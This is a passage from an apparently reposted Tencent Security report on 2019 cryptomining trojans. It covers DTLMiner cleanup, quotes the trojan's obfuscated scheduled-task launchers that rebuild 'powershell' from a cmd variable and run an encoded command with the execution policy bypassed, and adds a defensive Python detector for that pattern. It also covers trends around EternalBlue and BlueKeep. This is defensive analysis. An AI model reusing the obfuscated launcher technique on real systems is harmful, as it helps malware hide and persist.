
Tencent Security releases its 2019 annual mining trojan report (full text)


  WannaMiner cleanup recommendations

  3) DTLMiner (the "EternalBlue downloader" trojan)


  DTLMiner cleanup recommendations

  Delete the randomly named scheduled tasks: "VDoaC", "hadpeRz\oABwX", "lKNVFjCJm\oWuUXql"


  DTLMiner's randomly named scheduled tasks

  The program launched by each task is:

  /c "set A=power& call %A%shell -ep bypass -e <base64 payload omitted>"

  /c "set A=power& call %A%shell -ep bypass -e <base64 payload omitted>"

  /c "set A=power& call %A%shell -ep bypass -e <base64 payload omitted>"
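  The three task actions above share one signature: cmd.exe assembles the word "powershell" from an environment variable ("set A=power& call %A%shell") so that a naive string match on the task's action never sees the word, then runs an encoded command with the execution policy bypassed. The following Python is an added example written for this repost, not code from the Tencent report, from DTLMiner, or from the site; it shows how a defender can normalise exported scheduled-task actions, undo that variable trick, and flag the pattern. The task names and the benign actions are constructed samples, and the base64 payload is a harmless constructed one, since the report omits the real payload.

```python
"""Flag scheduled-task actions that use the DTLMiner-style obfuscation
described in the report: 'powershell' rebuilt from a cmd.exe variable,
-ExecutionPolicy Bypass, and an -EncodedCommand payload.

Added example; task names, benign actions and the payload are constructed."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# cmd.exe "set NAME=value&" assignments inside the action string.
SET_RE = re.compile(r"set\s+(\w+)=([^&\"]*)&", re.IGNORECASE)
# PowerShell encoded-command switch and its base64 argument.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)(?=\s|$)", re.IGNORECASE)
ENCODED_ARG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
EP_BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.IGNORECASE)


def resolve_cmd_vars(action: str) -> str:
    """Apply cmd.exe-style 'set X=val& ... %X%' substitutions so the
    concatenated 'powershell' becomes visible to a plain substring check."""
    env = {m.group(1): m.group(2) for m in SET_RE.finditer(action)}
    resolved = action
    for name, value in env.items():
        resolved = re.sub("%" + re.escape(name) + "%", value, resolved, flags=re.IGNORECASE)
    return resolved


def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell -EncodedCommand takes base64 of a UTF-16LE script."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    task: str
    resolved_action: str
    reasons: List[str] = field(default_factory=list)
    decoded_payload: Optional[str] = None


def analyse_task(task_name: str, action: str) -> Finding:
    """Return the indicators found in one task's action string."""
    resolved = resolve_cmd_vars(action)
    finding = Finding(task=task_name, resolved_action=resolved)
    # The word only appears after substitution: the launcher was hiding it.
    if "powershell" in resolved.lower() and "powershell" not in action.lower():
        finding.reasons.append("powershell assembled from cmd variables")
    if EP_BYPASS_RE.search(resolved):
        finding.reasons.append("execution policy bypass")
    if ENCODED_FLAG_RE.search(resolved):
        finding.reasons.append("encoded command")
        payload = ENCODED_ARG_RE.search(resolved)
        if payload:
            finding.decoded_payload = decode_encoded_command(payload.group(1))
    return finding


def suspicious(finding: Finding) -> bool:
    """Variable-assembled 'powershell' alone is enough; otherwise require
    both bypass and an encoded command, as in the report's task actions."""
    return ("powershell assembled from cmd variables" in finding.reasons
            or {"execution policy bypass", "encoded command"} <= set(finding.reasons))


def scan(tasks: Dict[str, str]) -> List[Finding]:
    """Analyse a name -> action mapping (e.g. exported with schtasks /query)."""
    return [f for f in (analyse_task(n, a) for n, a in tasks.items()) if suspicious(f)]


# Constructed harmless payload standing in for the omitted one.
ENCODED_SAMPLE = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()

# Constructed sample export: one action in the report's pattern, two benign ones.
SAMPLE_TASKS: Dict[str, str] = {
    r"hadpeRz\oABwX": f'/c "set A=power& call %A%shell -ep bypass -e {ENCODED_SAMPLE}"',
    r"Microsoft\Windows\Defrag\ScheduledDefrag": r"%windir%\system32\defrag.exe -c -h -o -$",
    r"Backup\NightlyExport": r"powershell.exe -NoProfile -File C:\scripts\export.ps1",
}

if __name__ == "__main__":
    for f in scan(SAMPLE_TASKS):
        print(f.task, "->", ", ".join(f.reasons))
        if f.decoded_payload:
            print("  decoded:", f.decoded_payload)
```

  On a real host the `SAMPLE_TASKS` mapping would be filled from `schtasks /query /fo csv /v` output or `Get-ScheduledTask` exports; the substitution step is what matters, because a signature that looks for the literal string "powershell" in the action never fires on these tasks.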

  6. Future trends of mining trojans

  6.1 The "EternalBlue" vulnerability

  Since the NSA tool leak of 2017, the "EternalBlue" vulnerability has been widely exploited by mining trojans. As the major security vendors have patched and defended against it, its impact is gradually shrinking. The data nevertheless show that about 30% of machines still have not installed the EternalBlue patch, so new mining trojans exploiting EternalBlue are likely to appear in 2020.

  6.2 The BlueKeep vulnerability

  On May 15, 2019, Microsoft released a fix for CVE-2019-0708, a critical remote code execution vulnerability in Remote Desktop Services (formerly Terminal Services). The vulnerability affects multiple Windows versions, including Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows 2003 and Windows XP. Once an attacker successfully triggers it, they can execute arbitrary code on the target system.

  In September 2019 we noticed that exploit code for CVE-2019-0708 had been published in the metasploit-framework pull requests and, in our tests, achieved remote code execution; in October 2019 the mining worm DTLMiner also added CVE-2019-0708 detection code to its attack module. We therefore expect that new mining trojans exploiting this vulnerability are very likely to appear in 2020.

  6.3 Botnets

  Mining botnets such as MyKings, KingMiner and WannaMiner infected large numbers of machines early on. Once in control of a system they persist through scheduled tasks, database stored procedures, WMI and similar techniques, so they can download the latest version of their malicious code from their servers at any time and are very hard to eradicate completely. The contest between security vendors and these malware gangs will continue.

This article was edited by 比特币官网; reproduction without permission is prohibited.
